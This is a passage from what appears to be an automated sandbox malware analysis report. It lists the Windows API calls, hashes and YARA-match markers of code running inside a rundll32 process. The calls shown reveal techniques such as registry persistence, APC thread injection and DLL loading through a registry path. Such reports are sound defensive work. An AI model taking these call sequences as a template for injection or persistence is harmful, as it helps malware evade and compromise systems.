                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00B66AED
                                          • lstrcatW.KERNEL32(00000000,?), ref: 00B66B13
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B66B22
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                          • String ID:
                                          • API String ID: 3868788785-0
                                          • Opcode ID: c117477033045475995f75dac9dfe2d8426121b59cb2a647c01e8ecdfd883422
                                          • Instruction ID: 2ce7bb5abcb6f55cdbbce1698663d9177b848e781d3035ecb77bc75133846b5b
                                          • Opcode Fuzzy Hash: c117477033045475995f75dac9dfe2d8426121b59cb2a647c01e8ecdfd883422
                                          • Instruction Fuzzy Hash: 5C313B32500204AFC720AFB4EC88E6F7BE9EF49311B19455DF619E3161DF349C858B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B62E7C
                                            • Part of subcall function 00B5B0A5: RegCloseKey.ADVAPI32(?), ref: 00B5B12C
                                          • lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 00B62EAB
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B62EBC
                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 00B62EF6
                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000004,00000004), ref: 00B62F18
                                          • RegCloseKey.ADVAPI32(?), ref: 00B62F21
                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 00B62F37
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B62F4C
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B62F60
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B62F75
                                          • RegCloseKey.ADVAPI32(?), ref: 00B62F7E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                                          • String ID:
                                          • API String ID: 534682438-0
                                          • Opcode ID: 1b3ad48017f8fafd9a0c4a4cd790dbc82ab88d8a309251df35223ac2c18c22f8
                                          • Instruction ID: 120fd5ceec5719cc5e10fddc957bc69a4ce924b70b7f3d0ff15bdfd1fb1ace31
                                          • Opcode Fuzzy Hash: 1b3ad48017f8fafd9a0c4a4cd790dbc82ab88d8a309251df35223ac2c18c22f8
                                          • Instruction Fuzzy Hash: 91315976900509FFEB119FA4EC88DAE7BF9FB48301B1444A5F609E3120DB369E94DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 00B60285
                                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,00B7049C,00000094,00000000,00000001,00000094,00000000,00000000,?,00B5B047,00000000,00000094), ref: 00B60297
                                          • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,00B7049C,00000094,00000000,00000001,00000094,00000000,00000000,?,00B5B047,00000000,00000094), ref: 00B602A4
                                          • wsprintfA.USER32 ref: 00B602BF
                                          • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,00B5B047,00000000,00000094,00000000), ref: 00B602D5
                                          • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 00B602EE
                                          • WriteFile.KERNEL32(00000000,00000000), ref: 00B602F6
                                          • GetLastError.KERNEL32 ref: 00B60304
                                          • CloseHandle.KERNEL32(00000000), ref: 00B6030D
                                          • GetLastError.KERNEL32(?,00000000,?,00B7049C,00000094,00000000,00000001,00000094,00000000,00000000,?,00B5B047,00000000,00000094,00000000), ref: 00B6031E
                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00B7049C,00000094,00000000,00000001,00000094,00000000,00000000,?,00B5B047,00000000,00000094), ref: 00B6032E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                                          • String ID:
                                          • API String ID: 3873609385-0
                                          • Opcode ID: 12855612cd8919f8e9f222db28875ab04461c16f8bbc9c4f69091f09add8115d
                                          • Instruction ID: 492f39f25361716a5dddd74f85c4298a2e70e5c1ab4a28a01ebd272e25b85aef
                                          • Opcode Fuzzy Hash: 12855612cd8919f8e9f222db28875ab04461c16f8bbc9c4f69091f09add8115d
                                          • Instruction Fuzzy Hash: 5611B472141218BFE2216B65AC8CFBB3B9CEB4A767F010065FA0BD3290DF250D85C675
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StrChrA.SHLWAPI(?,0000002C), ref: 00B51A7A
                                          • StrChrA.SHLWAPI(00000001,0000002C), ref: 00B51A8D
                                          • StrTrimA.SHLWAPI(?,?), ref: 00B51AB0
                                          • StrTrimA.SHLWAPI(00000001,?), ref: 00B51ABF
                                          • lstrlen.KERNEL32(?), ref: 00B51AF4
                                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 00B51B07
                                          • lstrcpy.KERNEL32(00000004,?), ref: 00B51B25
                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,-00000005,00000001), ref: 00B51B49
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                                          • String ID: W
                                          • API String ID: 1974185407-655174618
                                          • Opcode ID: cdefdf1e0b43efddfc76c0e89d36d8c20f289d1accf6c9b090b4834c686805a9
                                          • Instruction ID: db15f98dd6df0ce49cbf0164e41f396d0a72bc967793644b141fd649be1cf7b8
                                          • Opcode Fuzzy Hash: cdefdf1e0b43efddfc76c0e89d36d8c20f289d1accf6c9b090b4834c686805a9
                                          • Instruction Fuzzy Hash: 2A317E35900219FFDB119FA8DC48F9A7BF8EF09711F1444DAF909A7250EB709D848BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 00B6BCB7
                                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 00B6BCD6
                                            • Part of subcall function 00B63672: wsprintfA.USER32 ref: 00B63685
                                            • Part of subcall function 00B63672: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 00B63697
                                            • Part of subcall function 00B63672: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 00B636C1
                                            • Part of subcall function 00B63672: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B636D4
                                            • Part of subcall function 00B63672: CloseHandle.KERNEL32(?), ref: 00B636DD
                                          • GetLastError.KERNEL32 ref: 00B6BFA9
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B6BFB9
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B6BFCA
                                          • RtlExitUserThread.NTDLL(?), ref: 00B6BFD8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
                                          • String ID:
                                          • API String ID: 1258333524-0
                                          • Opcode ID: b2fb73cb9505ab494fc7a7f788256b1f1b0bfdcbc17f011ceffa97dfe498c5b5
                                          • Instruction ID: c85de7350e958fb9927aa34a61c34d666254fcf3ae227f2db6b85a15e53508bb
                                          • Opcode Fuzzy Hash: b2fb73cb9505ab494fc7a7f788256b1f1b0bfdcbc17f011ceffa97dfe498c5b5
                                          • Instruction Fuzzy Hash: EAB107B1500249EFEB309F61CC88EAA7BF9FF08305F1045A9FA5AD2160EB759995CF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(0614C1E8,00000000,00000000,00000000,?), ref: 00B5C4C1
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B5C4D0
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B5C4DD
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00B5C4F5
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B5C501
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5C51D
                                          • wsprintfA.USER32 ref: 00B5C5FF
                                          • memcpy.NTDLL(00000000,00004000,?), ref: 00B5C64C
                                          • InterlockedExchange.KERNEL32(00B79148,00000000), ref: 00B5C66A
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B5C6AB
                                            • Part of subcall function 00B6C301: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00B6C32A
                                            • Part of subcall function 00B6C301: memcpy.NTDLL(00000000,?,?), ref: 00B6C33D
                                            • Part of subcall function 00B6C301: RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B6C34E
                                            • Part of subcall function 00B6C301: RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B6C363
                                            • Part of subcall function 00B6C301: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00B6C39B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                                          • String ID:
                                          • API String ID: 4198405257-0
                                          • Opcode ID: 3c325e88b6b03b4d2c34ef8772f14a3928a938862ae15819f5897b523a411510
                                          • Instruction ID: b47f7c4a0971ad25990480866c4bdbe752ae591c6d611d5e1c14237ab1ad4d9c
                                          • Opcode Fuzzy Hash: 3c325e88b6b03b4d2c34ef8772f14a3928a938862ae15819f5897b523a411510
                                          • Instruction Fuzzy Hash: 47615C7190020AEFDF10DFA5DC85EAE7BFAEB48301F0584A9F809E7250DB709A58CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00B5BD7D
                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00B79208,00000003,00000000,00000000,?,?,00000000), ref: 00B5BD9A
                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00B5BE42
                                            • Part of subcall function 00B69C23: lstrlen.KERNEL32(?,00000000,?,00000027,00B79208,?,00000000,?,?,?,?,?,00B5BDC2,?,00000001), ref: 00B69C59
                                            • Part of subcall function 00B69C23: lstrcpy.KERNEL32(00000000,00000000), ref: 00B69C7D
                                            • Part of subcall function 00B69C23: lstrcat.KERNEL32(00000000,00000000), ref: 00B69C85
                                          • GetFileSize.KERNEL32(?,00000000,?,00000001,?,?,00000000), ref: 00B5BDCD
                                          • CreateFileMappingA.KERNEL32(00000000,00B79208,00000002,00000000,00000000,?), ref: 00B5BDE1
                                          • lstrlen.KERNEL32(?,?,?,00000000), ref: 00B5BDFD
                                          • lstrcpy.KERNEL32(?,?), ref: 00B5BE0D
                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00B5BE15
                                          • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 00B5BE28
                                          • CloseHandle.KERNEL32(?,?), ref: 00B5BE3A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                          • String ID:
                                          • API String ID: 194907169-0
                                          • Opcode ID: 62addc5bba83ce87a34fd273f46842b0141913d8e6e3d6db7333181157ba414e
                                          • Instruction ID: 60d0590bc3b95b7ba25edfd69013a43317b9e79380e2851ee83bd767c5be2783
                                          • Opcode Fuzzy Hash: 62addc5bba83ce87a34fd273f46842b0141913d8e6e3d6db7333181157ba414e
                                          • Instruction Fuzzy Hash: B2211E71800208FFDB109FA4DC89E9D7FB9FB04356F1084A9FA1AE3260D7715A94DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CloseHandle.KERNEL32(?), ref: 00B55DC6
                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00B55DD2
                                          • GetModuleHandleA.KERNEL32(?,0614978E), ref: 00B55DF2
                                          • GetProcAddress.KERNEL32(00000000), ref: 00B55DF9
                                          • Thread32First.KERNEL32(?,0000001C), ref: 00B55E09
                                          • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 00B55E24
                                          • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 00B55E35
                                          • CloseHandle.KERNEL32(00000000), ref: 00B55E3C
                                          • Thread32Next.KERNEL32(?,0000001C), ref: 00B55E45
                                          • CloseHandle.KERNEL32(?), ref: 00B55E51
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                                          • String ID:
                                          • API String ID: 2341152533-0

                                          APIs
                                          • SetEvent.KERNEL32(?,?,00B6F846), ref: 00B5609F
                                            • Part of subcall function 00B6FDDB: InterlockedExchange.KERNEL32(00B65593,000000FF), ref: 00B6FDE2
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00B6F846), ref: 00B560BF
                                          • CloseHandle.KERNEL32(00000000,?,00B6F846), ref: 00B560C8
                                          • CloseHandle.KERNEL32(00000000,?,?,00B6F846), ref: 00B560D2
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B560DA
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B560F2
                                          • Sleep.KERNEL32(000001F4), ref: 00B56101
                                          • CloseHandle.KERNEL32(?), ref: 00B5610E
                                          • LocalFree.KERNEL32(?), ref: 00B56119
                                          • RtlDeleteCriticalSection.NTDLL(?), ref: 00B56123
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 1408595562-0

                                          APIs
                                          • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,00B5D2C5,00000000,00000001,?,?,?), ref: 00B53827
                                          • lstrlen.KERNEL32(?), ref: 00B53837
                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B5386B
                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 00B53896
                                          • memcpy.NTDLL(00000000,?,?), ref: 00B538B5
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B53916
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 00B53938
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Allocatelstrlenmemcpy$Free
                                          • String ID: W
                                          • API String ID: 3204852930-655174618

                                          APIs
                                            • Part of subcall function 00B5F123: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,00B6C0A9,00000000,00000000,00000004,00000000,?,00B6A6B6,?,?,00000000), ref: 00B5F12F
                                            • Part of subcall function 00B5F123: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00B6C0A9,00000000,00000000,00000004,00000000,?,00B6A6B6,?), ref: 00B5F18D
                                            • Part of subcall function 00B5F123: lstrcpy.KERNEL32(00000000,00000000), ref: 00B5F19D
                                          • lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 00B62B1A
                                          • wsprintfA.USER32 ref: 00B62B48
                                          • lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 00B62BA6
                                          • GetLastError.KERNEL32 ref: 00B62BBD
                                          • ResetEvent.KERNEL32(?), ref: 00B62BD1
                                          • ResetEvent.KERNEL32(?), ref: 00B62BD6
                                          • GetLastError.KERNEL32 ref: 00B62BEE
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
                                          • String ID: `
                                          • API String ID: 2276693960-1850852036

                                          APIs
                                          • lstrlen.KERNEL32(00B5D8E9,00000000,?,?,?,?,00B5D8E9,00000035,00000000,?,00000000), ref: 00B53652
                                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00B53668
                                          • memcpy.NTDLL(00000010,00B5D8E9,00000000,?,?,00B5D8E9,00000035,00000000), ref: 00B5369E
                                          • memcpy.NTDLL(00000010,00000000,00000035,?,?,00B5D8E9,00000035), ref: 00B536B9
                                          • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 00B536D7
                                          • GetLastError.KERNEL32(?,?,00B5D8E9,00000035), ref: 00B536E1
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00B5D8E9,00000035), ref: 00B53704
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                          • String ID: (
                                          • API String ID: 2237239663-3887548279

                                          APIs
                                          • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 00B56793
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 00B5684B
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 00B567E1
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B567FA
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00B56819
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 00B5682B
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00B56833
                                          Strings
                                          • Software\Microsoft\WAB\DLLPath, xrefs: 00B56784
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                                          • String ID: Software\Microsoft\WAB\DLLPath
                                          • API String ID: 1628847533-3156921957

                                          APIs
                                          • RtlAllocateHeap.NTDLL ref: 00B6A340
                                          • memset.NTDLL ref: 00B6A354
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,748FD3B0,76D85520,?,?,?,00B521C2,?), ref: 00B5EEDC
                                            • Part of subcall function 00B5EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5EEF0
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF0A
                                            • Part of subcall function 00B5EEA4: RegCloseKey.KERNEL32(?,?,?,?,00B521C2,?,?,?), ref: 00B5EF34
                                          • GetCurrentThreadId.KERNEL32 ref: 00B6A3E1
                                          • GetCurrentThread.KERNEL32 ref: 00B6A3F4
                                          • RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B6A49B
                                          • Sleep.KERNEL32(0000000A), ref: 00B6A4A5
                                          • RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B6A4CB
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6A4F9
                                          • HeapFree.KERNEL32(00000000,00000018), ref: 00B6A50C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                                          • String ID:
                                          • API String ID: 1146182784-0

                                          APIs
                                            • Part of subcall function 00B6ACA0: RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B6ACA8
                                            • Part of subcall function 00B6ACA0: RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B6ACBD
                                            • Part of subcall function 00B6ACA0: InterlockedIncrement.KERNEL32(0000001C), ref: 00B6ACD6
                                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 00B606BF
                                          • memset.NTDLL ref: 00B606D0
                                          • lstrcmpi.KERNEL32(?,?), ref: 00B60710
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B6073C
                                          • memcpy.NTDLL(00000000,?,?), ref: 00B60750
                                          • memset.NTDLL ref: 00B6075D
                                          • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 00B60776
                                          • memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 00B60799
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B607B6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                                          • String ID:
                                          • API String ID: 694413484-0

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00B6790C
                                          • lstrlen.KERNEL32(?), ref: 00B67914
                                          • lstrlen.KERNEL32(?), ref: 00B6797F
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B679AA
                                          • memcpy.NTDLL(00000000,00000002,?), ref: 00B679BB
                                          • memcpy.NTDLL(00000000,?,?), ref: 00B679D1
                                          • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 00B679E3
                                          • memcpy.NTDLL(00000000,00B743E8,00000002,00000000,?,?,00000000,?,?), ref: 00B679F6
                                          • memcpy.NTDLL(00000000,?,00000002), ref: 00B67A0B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$lstrlen$AllocateHeap
                                          • String ID:
                                          • API String ID: 3386453358-0

                                          APIs
                                            • Part of subcall function 00B6ACA0: RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B6ACA8
                                            • Part of subcall function 00B6ACA0: RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B6ACBD
                                            • Part of subcall function 00B6ACA0: InterlockedIncrement.KERNEL32(0000001C), ref: 00B6ACD6
                                          • RtlAllocateHeap.NTDLL(00000000,00B579C7,00000000), ref: 00B6B896
                                          • lstrlen.KERNEL32(00000008,?,?,?,00B579C7,00000000), ref: 00B6B8A5
                                          • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 00B6B8B7
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,00B579C7,00000000), ref: 00B6B8C7
                                          • memcpy.NTDLL(00000000,00000000,00B579C7,?,?,?,00B579C7,00000000), ref: 00B6B8D9
                                          • lstrcpy.KERNEL32(00000020), ref: 00B6B90B
                                          • RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B6B917
                                          • RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B6B96F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3746371830-0

                                          APIs
                                            • Part of subcall function 00B5A689: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B5A6BB
                                            • Part of subcall function 00B5A689: HeapFree.KERNEL32(00000000,00000000,?,?,00B5158A,?,00000022,00000000,00000000,00000000,?,?), ref: 00B5A6E0
                                            • Part of subcall function 00B52CBD: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00B515AB,?,?,?,?,?,00000022,00000000,00000000), ref: 00B52CF9
                                            • Part of subcall function 00B52CBD: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,00B515AB,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 00B52D4C
                                          • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00B515E0
                                          • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00B515E8
                                          • lstrlen.KERNEL32(?), ref: 00B515F2
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B51607
                                          • wsprintfA.USER32 ref: 00B51643
                                          • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 00B51662
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B51677
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B51684
                                          • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00B51692
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                                          • String ID:
                                          • API String ID: 168057987-0

                                          APIs
                                          • CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 00B534C6
                                          • GetLastError.KERNEL32 ref: 00B534D0
                                          • WaitForSingleObject.KERNEL32(000000C8), ref: 00B534F5
                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00B53518
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00B53540
                                          • WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 00B53555
                                          • SetEndOfFile.KERNEL32(?), ref: 00B53562
                                          • GetLastError.KERNEL32 ref: 00B5356E
                                          • CloseHandle.KERNEL32(?), ref: 00B5357A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                                          • String ID:
                                          • API String ID: 2864405449-0

                                          APIs
